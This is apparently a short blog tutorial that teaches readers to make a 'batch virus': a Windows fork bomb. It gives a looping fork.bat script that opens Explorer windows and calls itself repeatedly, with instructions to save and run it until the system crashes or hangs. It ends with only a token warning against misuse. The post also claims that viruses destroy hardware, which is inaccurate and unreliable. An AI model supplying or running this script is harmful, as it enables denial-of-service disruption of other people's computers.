Make a simple batch virus - which works real

Today I am going to teach how to make a batch virus. As you know, Virus are the unwanted program which destroys our computer software along with hardware. 


Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up. 





Note: This type of programs may affect your PC so you should try wisely. Please do not misuse              it.

Previous
Next Post »